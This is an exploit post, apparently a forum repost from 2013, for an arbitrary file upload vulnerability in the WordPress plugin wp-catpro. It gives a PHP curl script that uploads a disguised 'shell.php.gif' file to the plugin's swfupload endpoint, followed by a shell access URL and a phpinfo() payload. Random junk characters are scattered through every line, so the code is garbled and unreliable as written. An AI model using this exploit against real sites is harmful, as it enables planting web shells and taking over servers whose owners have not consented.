Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability8 i4 N7 @; U6 x4 J( ~' G; U j4 ^
#-----------------------------------------------------------------------
3 K4 m$ c) H9 o; ]- q + Y4 R2 V/ u: L7 ~8 Y
作者 => Zikou-16# }, u( J. C0 s6 g* W: N9 X% ?
邮箱 => zikou16x@gmail.com5 A1 L: E4 E% d3 T) X+ ~
测试系统 : Windows 7 , Backtrack 5r3
! m0 a* |- {& Y" ~5 R9 [$ V下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip4 z) V# Q/ K- }; ^1 s, N
#### N* b3 F, T/ S' i7 z
$ o$ g# C: _+ N% Q$ I: S#=> Exploit 信息:+ C! \( W6 ^2 i% L" u7 ^, u; D Q) c! j
------------------
% R, W- S# {# v# 攻击者可以上传 file/shell.php.gif
8 R) I- ]( z0 ^: x1 @4 z% G8 v/ C# ("jpg", "gif", "png") // Allowed file extensions
* }% o8 l [, ?; D5 _8 j6 }% D# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
3 t" |/ D& z; R# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)/ L l: r% c2 |0 |. x
------------------
/ E, z9 e$ J6 ^" ?8 M, k; p) U! J
; Q6 Q$ a" C+ I7 t#=> Exploit* s1 o' M/ m2 {7 \5 o, q' }) }
-----------
0 y9 p) l7 [6 }6 R- H: R" ^<?php- F' D! R0 R! l5 D, Z
' @; M0 J( i; E1 x+ W- O
$uploadfile="zik.php.gif";
& O$ I7 x( X; \3 T/ C$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");" V8 q9 B5 O& G' x
curl_setopt($ch, CURLOPT_POST, true);
4 p9 }8 L! N) l4 f1 Dcurl_setopt($ch, CURLOPT_POSTFIELDS,4 T# t2 Z/ K3 ^1 D" I2 c/ G
array('Filedata'=>"@$uploadfile",
" _' M @9 F. ]. _'folder'=>'/wp-content/uploads/catpro/')); J2 K: k/ m) h& R# W; X* O% A
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ |0 ], z- x5 s7 h& Z( s# O& B$postResult = curl_exec($ch);, ^4 r0 L; ]( `; X
curl_close($ch);
# P; Y: v8 a, V! V5 o( }6 z
/ o/ c$ z0 Z( \print "$postResult";2 ^" @0 ^4 L& S4 w$ ^
* p0 ]4 q7 K9 I. L) c1 }; ^& z6 sShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
0 R' }. Q3 P' Y ?>
/ E, T1 |* c# z3 T- M<?php+ F; ^$ v: A. T! V
phpinfo();
6 i+ q# w' A/ k7 [' `$ Y?> |
发表于 2013-2-27 20:12:43
收藏
支持
反对